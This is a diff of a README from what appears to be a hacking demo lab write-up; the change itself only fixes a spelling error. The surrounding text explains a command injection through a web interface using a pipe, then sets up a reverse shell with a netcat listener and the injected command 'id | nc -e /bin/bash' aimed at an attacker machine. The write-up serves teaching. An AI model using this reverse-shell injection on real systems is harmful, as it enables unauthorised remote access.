cristinavisentin/hackingdemo/README.md

 - operand `|`, called Pipe, simply takes as input of the second command the output of the first, but since `ls` doesn't do anything with its input the result of `id | ls` is just the output of `ls`.

 ### Execution
-Since the circumvention has been found is time now to expoit it for establishing a connection through the web shell and the Kali machine.
+Since the circumvention has been found is time now to exploit it for establishing a connection through the web shell and the Kali machine.
 This is done using Netcat which is a command line tool for remote communication over TCP connections
 - on Kali side the command `nc -lvp 6000` is ran, so the Kali machine is now listening on port 6000 for connection requests: this is the server side of the future TCP connection
 - on the web interface of the target, command `id | nc -e /bin/bash 10.0.2.6 6000` is ran: this will be the client side of the TCP connection.